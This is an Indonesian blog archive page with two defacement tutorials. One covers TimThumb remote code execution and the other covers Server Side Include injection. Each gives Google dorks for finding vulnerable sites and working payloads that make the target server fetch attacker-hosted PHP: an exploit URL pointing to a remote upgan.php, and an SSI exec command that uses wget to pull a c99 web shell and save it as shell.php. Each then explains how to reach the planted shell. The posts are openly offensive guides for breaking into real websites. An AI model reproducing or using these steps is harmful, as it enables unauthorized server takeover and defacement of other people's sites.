Ads

Archive for July 2019


Hallo sob kali ini saya bakalan ngasih tutor deface poc timthumb RCE, langsung aja gass.

Dork : inurl:/timthumb.php?src= (Kembangin lagi dengan otak vokep lu :V )
Exploit : ?src=http://flickr.com.irfanmuhluster.web.id/upgan.php


  • Pertama kita dorking dulu di google '<'
  • Kalo udah nemu tinggal klik
  • Kalo vuln ada tulisan kayak gini
  • Nah kalo kayak gitu insyallah vuln 
  • Langsung aja masukin exploitnya
  • Kayak gini : http://target.com/timthumb.php
    ?src=http://flickr.com.irfanmuhluster.web.id/upgan.php
  • Nah jika berhasil nanti bakalan muncul seperti ini
  • Nah kalo muncul kayak gitu tinggal akses shellnya.
  • Caranya gimana? Copy dir sesudah /public_html/ sampai .php 
  • Nanti bakalan muncul seperti ini '<'
Nah gimana? Simple kan, semoga bermanfaat jangan lupa share ya bambang :V

Note : MarsHall itu tamvan sangat wkwk 

Deface Poc Timthumb RCE

Saturday, July 6, 2019
0 Comments

Deface Dengan Cara Server Side Include Injection (SSI Injection)

Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection

Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.

Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.


DORK

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:




Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

<!--#echo var="HTTP_USER_AGENT" -->

Lalu akan muncul ini




Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->

Kalau berhasil akan muncul seprti ini


The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php


Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)


Deface Dengan Cara Server Side Include Injection (SSI Injection)

Friday, July 5, 2019
0 Comments

- Copyright © Learning Tech - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -